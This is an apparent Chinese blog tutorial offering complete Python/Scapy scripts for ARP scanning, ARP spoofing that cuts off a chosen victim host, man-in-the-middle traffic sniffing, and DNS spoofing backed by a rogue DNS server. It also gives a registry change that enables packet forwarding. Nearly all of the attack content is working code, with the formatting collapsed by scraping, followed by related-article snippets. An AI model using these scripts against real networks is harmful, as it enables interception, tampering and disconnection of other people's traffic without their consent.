Python 实现ARP扫描与欺骗

ARP欺骗又称ARP毒化或ARP攻击，是针对以太网地址解析协议ARP的一种攻击技术，通过欺骗局域网内访问者PC的网关MAC地址，使访问者PC错以为攻击者更改后的MAC地址是网关的MAC，导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包，且可让网络上特定计算机或所有计算机无法正常连线。

实现ARP扫描: 运用Scapy工具包，开发一款ARP扫描工具，扫描网段内所有的在线主机并显示其MAC地址。

from scapy.all import *
from optparse import OptionParser
import threadingdef parse_ip(targets):_split = targets.split('-')first_ip = _split[0]ip_split = first_ip.split('.')ipv4 = range(int(ip_split[3]),int(_split[1])+1)addr = [ ip_split[0]+'.'+ip_split[1]+'.'+ip_split[2]+'.'+str(p) for p in ipv4 ]return addrdef arp_scan(address):try:ret = sr1(ARP(pdst=address),timeout=5,verbose=False)if ret:if ret.haslayer('ARP') and ret.fields['op'] == 2:print('[+] IP地址: {} => MAC地址:{}'.format(ret.fields['psrc'],ret.fields['hwsrc']))except Exception:exit(1)def Banner():print("  _          ____  _                _    ")print(" | |   _   _/ ___|| |__   __ _ _ __| | __")print(" | |  | | | \___ \| '_ \ / _` | '__| |/ /")print(" | |__| |_| |___) | | | | (_| | |  |   < ")print(" |_____\__, |____/|_| |_|\__,_|_|  |_|\_\\")print("       |___/                             \n")print("E-Mail: me@lyshark.com\n")if __name__ == "__main__":Banner()parser = OptionParser()parser.add_option("-a","--addr",dest="address",help="--> input 192.168.1.0-100")(options,args) = parser.parse_args()if options.address:addr_list = parse_ip(options.address)for item in addr_list:threads = []t = threading.Thread(target=arp_scan,args=(item,))threads.append(t)t.start()for item in threads:item.join()else:parser.print_help()

执行扫描如下:

实现ARP欺骗: 通过ARP协议扫描网络中在线主机,并能够指定IP地址断掉网络.

from scapy.all import *
import argparse
import threading,time# 生成网段信息,例如输入: 192.168.1.1/20 生成`1-20`地址
def Parse_IP(targets):_split = targets.split('/')first_ip = _split[0]ip_split = first_ip.split('.')ipv4 = range(int(ip_split[3]),int(_split[1])+1)addr = [ ip_split[0]+'.'+ip_split[1]+'.'+ip_split[2]+'.'+str(p) for p in ipv4 ]return addr# 通过ARP协议扫描局域网中在线的设备
def ARP_Scan(address):try:ret = sr1(ARP(pdst=address),timeout=5,verbose=False)if ret:if ret.haslayer('ARP') and ret.fields['op'] == 2:print('[+] IP地址: %-13s ==> MAC地址: %-15s' %(ret.fields['psrc'],ret.fields['hwsrc']))except Exception:exit(1)# 创建并发送有效载荷
def SendPayload(Interface,srcMac,tgtMac,gateWayMac,gatewayIP,tgtIP):print("[+] 目标MAC: {} 目标IP: {} 发送: 2 packets".format(tgtMac,tgtIP))# 生成ARP数据包,伪造网关欺骗目标计算机sendp(Ether(src=srcMac,dst=tgtMac)/ARP(hwsrc=srcMac,psrc=gatewayIP,hwdst=tgtMac,pdst=tgtIP,op=2),iface=Interface)# 生成ARP数据包,伪造目标计算机欺骗网关sendp(Ether(src=srcMac,dst=gatewayMac)/ARP(hwsrc=srcMac,psrc=tgtIP,hwdst=gatewayMac,pdst=gatewayIP,op=2),iface=Interface)print("-------------------------------------------------------------------------")def Banner():print("  _          ____  _                _    ")print(" | |   _   _/ ___|| |__   __ _ _ __| | __")print(" | |  | | | \___ \| '_ \ / _` | '__| |/ /")print(" | |__| |_| |___) | | | | (_| | |  |   < ")print(" |_____\__, |____/|_| |_|\__,_|_|  |_|\_\\")print("       |___/                             \n")print("E-Mail: me@lyshark.com\n")if __name__ == "__main__":Banner()parser = argparse.ArgumentParser()parser.add_argument("-s","--scan",dest="scan",help="输入一个扫描网段")parser.add_argument("-i","--interface",dest="interface",help="输入接口名")parser.add_argument("-g","--gateway",dest="gateway",help="输入网关地址")parser.add_argument("-t","--target",dest="target",help="输入被害主机地址")args = parser.parse_args()# 使用方式: main.py -s192.168.1.1/100if args.scan:addr_list = Parse_IP(args.scan)for item in addr_list:threads = []t = threading.Thread(target=ARP_Scan,args=(item,))threads.append(t)t.start()for item in threads:item.join()# 使用方式: main.py -i "Realtek PCIe GBE Family Controller" -g 192.168.1.1 -t 192.168.1.10elif args.gateway and args.target and args.scan == None:srcMac = get_if_hwaddr(args.interface)                 # 通过接口名称获取本机MAC地址tgtMac = getmacbyip(args.target)                       # 通过IP地址获取目标计算机的MAC地址gatewayMac = getmacbyip(args.gateway)                  # 指定本机网段的网关MAC地址while True:t = threading.Thread(target=SendPayload,args=(args.interface,srcMac,tgtMac,gatewayMac,args.gateway,args.target))t.start()t.join()time.sleep(1)else:parser.print_help()

开启转发功能，开始运行里面输入regedit打开注册表编辑器，在注册表定位下面注册表项。

HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/ Services/Tcpip/Parameters

选择下面的项目：IPEnableRouter:REG_DWORD:0x0 找到项目鼠标右键修改数值为1

ARP数据嗅探: 利用欺骗实现的局域网嗅探工具Windows下需要开启Routing And RemoteAccess转发服务.

import sys,os,threading
import argparse
from scapy.all import *# 生成ARP数据包,伪造网关欺骗目标计算机
def createArp2Station(interface,target_ip,gateway_ip):dst_Mac=str(getmacbyip(target_ip))self_Mac=str(get_if_hwaddr(interface))Ether_data=Ether(src=self_Mac,dst=dst_Mac) / ARP(op=2,hwsrc=self_Mac,psrc=gateway_ip,hwdst=dst_Mac,pdst=target_ip)try:sendp(Ether_data,inter=2,iface=interface,loop=1)except Exception as e:print("目标ARP数据发送失败!")# 生成ARP数据包,伪造目标计算机欺骗网关
def createArp2Gateway(interface,target_ip,gateway_ip):dst_Mac = getmacbyip(gateway_ip)self_Mac = get_if_hwaddr(interface)Ether_data = NoneEther_data = Ether(src=self_Mac, dst=dst_Mac) / ARP(op=2, hwsrc=self_Mac, psrc=target_ip, hwdst=dst_Mac, pdst=gateway_ip)try:sendp(Ether_data, inter=2,iface=interface,loop=1)except Exception as e:print("网关ARP数据发送失败!")def Packet_CallBack(pkt):if pkt.haslayer(IP):if pkt.getlayer(IP).src != "127.0.0.1":ip_src = pkt.getlayer(IP).srcip_dst = pkt.getlayer(IP).dstprint("源地址: {} ---> 目标地址: {}".format(ip_src,ip_dst))def Banner():print("  _          ____  _                _    ")print(" | |   _   _/ ___|| |__   __ _ _ __| | __")print(" | |  | | | \___ \| '_ \ / _` | '__| |/ /")print(" | |__| |_| |___) | | | | (_| | |  |   < ")print(" |_____\__, |____/|_| |_|\__,_|_|  |_|\_\\")print("       |___/                             \n")print("E-Mail: me@lyshark.com\n")if __name__ == "__main__":# 使用方式: main.py -i "Realtek PCIe GBE Family Controller" -g 192.168.1.1 -t 192.168.1.10Banner()parser = argparse.ArgumentParser()parser.add_argument("-i","--interface",dest="interface",help="输入网卡名称")parser.add_argument("-t","--target_ip",dest="target_ip",help="输入目标主机IP")parser.add_argument("-g","--gateway",dest="gateway",help="输入网关地址")args = parser.parse_args()if args.interface and args.target_ip and args.gateway:try:t1=threading.Thread(target=createArp2Station,args=(args.interface,args.target_ip,args.gateway))t1.setDaemon(True)t1.start()t2=threading.Thread(target=createArp2Gateway,args=(args.interface,args.target_ip,args.gateway))t2.setDaemon(True)t2.start()sniff(prn=Packet_CallBack,filter="tcp",iface=args.interface)except Exception:sys.exit(1)while True:passelse:parser.print_help()
# http and ip.src_host==192.168.1.6 and http.request.method==GET and !(http.request.full_uri matches "http://.*\.jpg.*")

实现DNS欺骗: 网上其他人的一种实现方法，代码如下，只不过我们只做了ARP骗，而在该欺骗基础上可以加强为DNS欺骗。

import sys
import os
import threading
from scapy.all import *
from optparse import  OptionParser#DNS欺骗函数
def DNS_Spoof(data):if data.haslayer(DNS):try:#构造DNS AN数据dns_an=DNSRR(rrname=data[DNS].qd.qname,rdata=jokers)#构造IP/UDP数据包repdata=IP(src=data[IP].dst,dst=data[IP].src)/UDP(dport=data[IP].sport,sport=53)#构造DNS数据包repdata/=DNS(id=data[DNS].id,qd=data[DNS].qd,qr=1,an=dns_an)#攻击信息输出print ('\nhancker ip :' + jokers + " url : "+data[DNS].qd.qname)#发送数据包send(repdata)except Exception:sys.exit(1)#DNS欺骗函数
def DNS_S(dns_ip,iface):global jokersjokers=dns_ipprint ("DNS欺骗开始!")sniff(prn=DNS_Spoof,filter='udp dst port 53',iface=iface)#ARP欺骗函数
def op(eths,mubiao_ip,Ps,gateway_ip):ip=mubiao_ipwifi=gateway_ip#目标设备MAC地址dst_Mac=str(getmacbyip(ip))#黑客设备mac地址self_Mac=str(get_if_hwaddr(eths))#网关MAC地址wifi_Mac=str(getmacbyip(wifi))#构造以太帧数据Ether_data=Ether(src=self_Mac,dst=dst_Mac)/ARP(op=2,hwsrc=self_Mac,psrc=wifi,hwdst=dst_Mac,pdst=ip)try:#发送以太帧数据，sendp发送OSI模型中的二层数据sendp(Ether_data,inter=2,iface=eths,loop=1)except Exception as e:print("目标ARP数据发送失败!")def wifi(eths,mubiao_ip,gateway_ip,Ps,dns_ip):ip=gateway_ipdst=mubiao_ipet = eths#根据IP获取MACdst_Mac = getmacbyip(ip)#根据网卡获取MACself_Mac = get_if_hwaddr(et)Ether_data = Noneif Ps=="1":#构造以太帧数据与ARP响应数据，ARP协议源地址给一个不存在的MAC地址与正确的IP地址对应，实现双向的无法解析，ARP协议的op参数是状态，2为响应数据，1为请求数据Ether_data = Ether(src=self_Mac, dst=dst_Mac) / ARP(op=2, hwsrc='12:1a:13:a3:13:ef', psrc=dst, hwdst=dst_Mac, pdst=ip)#新线程，开始DNS欺骗t3 = threading.Thread(target=DNS_S, args=(dns_ip,eths))t3.setDaemon(True)t3.start()if Ps == "0":#构造以太帧数据与ARP响应数据，这里因为不需要DNS欺骗，所以不需要一个假的MAC地址，让双方通信设备正常访问即可Ether_data = Ether(src=self_Mac, dst=dst_Mac) / ARP(op=2, hwsrc=self_Mac, psrc=dst, hwdst=dst_Mac, pdst=ip)if Ps!="1" and Ps!="0":print (Ps)print (type(Ps))print ('-P 参数有误！')sys.exit(1)try:sendp(Ether_data, inter=2,iface=et,loop=1)except Exception as e:print("网关ARP数据发送失败!")def main():try:eth= "Realtek PCIe GBE Family Controller"mubiao="192.168.1.6"gateway="192.168.1.1"P="0"dip="8.8.8.8"t1=threading.Thread(target=op,args=(eth,mubiao,P,gateway))t1.setDaemon(True)t1.start()t2=threading.Thread(target=wifi,args=(eth,mubiao,gateway,P,dip))t2.setDaemon(True)t2.start()except Exception as e:print (e)sys.exit(1)while True:passif __name__ == '__main__':main()

DNS欺骗需要一个DNS解析服务器，这里从网上找到一个DNS解析服务器代码，可以快速解析。

import socketserver,structclass SinDNSQuery:def __init__(self, data):i = 1self.name = ''while True:d = data[i]if d == 0:break;if d < 32:self.name = self.name + '.'else:self.name = self.name + chr(d)i = i + 1self.querybytes = data[0:i + 1](self.type, self.classify) = struct.unpack('>HH', data[i + 1:i + 5])self.len = i + 5def getbytes(self):return self.querybytes + struct.pack('>HH', self.type, self.classify)class SinDNSAnswer:def __init__(self, ip):self.name = 49164self.type = 1self.classify = 1self.timetolive = 190self.datalength = 4self.ip = ipdef getbytes(self):res = struct.pack('>HHHLH', self.name, self.type, self.classify, self.timetolive, self.datalength)s = self.ip.split('.')res = res + struct.pack('BBBB', int(s[0]), int(s[1]), int(s[2]), int(s[3]))return resclass SinDNSFrame:def __init__(self, data):(self.id, self.flags, self.quests, self.answers, self.author, self.addition) = struct.unpack('>HHHHHH', data[0:12])self.query = SinDNSQuery(data[12:])def getname(self):return self.query.namedef setip(self, ip):self.answer = SinDNSAnswer(ip)self.answers = 1self.flags = 33152def getbytes(self):res = struct.pack('>HHHHHH', self.id, self.flags, self.quests, self.answers, self.author, self.addition)res = res + self.query.getbytes()if self.answers != 0:res = res + self.answer.getbytes()return resclass SinDNSUDPHandler(socketserver.BaseRequestHandler):def handle(self):data = self.request[0].strip()dns = SinDNSFrame(data)socket = self.request[1]namemap = SinDNSServer.namemapif(dns.query.type==1):name = dns.getname();if namemap.__contains__(name):dns.setip(namemap[name])socket.sendto(dns.getbytes(), self.client_address)elif namemap.__contains__('*'):dns.setip(namemap['*'])socket.sendto(dns.getbytes(), self.client_address)else:socket.sendto(data, self.client_address)else:socket.sendto(data, self.client_address)class SinDNSServer:def __init__(self, port=53):SinDNSServer.namemap = {}self.port = portdef addname(self, name, ip):SinDNSServer.namemap[name] = ipdef start(self):HOST, PORT = "0.0.0.0", self.portserver = socketserver.UDPServer((HOST, PORT), SinDNSUDPHandler)server.serve_forever()if __name__ == "__main__":server = SinDNSServer()server.addname('www.lyshark.com', '192.168.1.1')server.addname('*', '192.168.1.2')server.start()

Python 实现ARP扫描与欺骗相关推荐

Python 实现ARP与DNS欺骗
利用Scapy进行ARP缓存投毒 from scapy.all import * import os import sys import threading import signaldef rest ...
python arp_用Python构造ARP请求、扫描、欺骗
0. ARP介绍首先,先回忆下TCP/IP模型,从下到上分为:数据链路层.网络层.传输层.应用层,那么ARP到底属于哪一层?有人会说是网络层,但实际是属于数据链路层,只不过还要为网络层提供服务. A ...
python arp扫描_基于python的局域网arp扫描
ARP协议 ARP 协议也叫做地址解析协议,就是IP地址转换成MAC地址的协议原理:在局域网内广播,向所有的主机发送包含目标IP地址的请求报文,如果该IP地址的主机接到了报文,那么就会将自己的MAC ...
python arp攻击_ARP欺骗——用Python实现道德黑客攻击的自动化
当你告诉别人你是一个有道德的黑客时,他们会把你当成一个巫师.好吧,这就是做一个有道德的黑客的意义:有知识.有能力.有良知去做正确的事情!就像魔杖对巫师一样,Python让道德黑客变得更加强大.在上一个 ...
pythonarp工具_Python 实现ARP扫描欺骗工具
实现简单的ARP扫描工具: 传入扫描参数main.py -a 192.168.1.1-100 扫描网段内所有的在线主机并显示其MAC地址. from scapy.all import * from o ...
python之arp欺骗
kali使用Ettercap进行arp欺骗 arp欺骗原理:明天补上 192.168.0.105加入target1,192.168.0.1网关加入target2 点击MITM中的ARP windows ...
python arp扫描_Python3利用scapy局域网实现自动多线程arp扫描功能
一.所需Python库 from scapy.all import * import threading 二.实现ip扫描 1.获取c段ip地址在ARP()里面有ip地址,我们可以从里面提取出前3段 ...
python arp协议分析_通过python对本局域网进行ARP扫描获取MAC
#!/usr/local/bin/python3 """ 对本局域网进行ARP扫描 ARP (Address Resolution Protocol,ARP); 以太网M ...
2.9 ARP和DNS欺骗
1.预备知识:ARP和DNS欺骗原理 1.1ARP欺骗 ARP(Address Resolution Protocol,地址解析协议)涉及TCP\IP体系结构中网络层的IP地址和数据链路层的MAC地址 ...

Python 实现ARP扫描与欺骗

Python 实现ARP扫描与欺骗相关推荐

最新文章

热门文章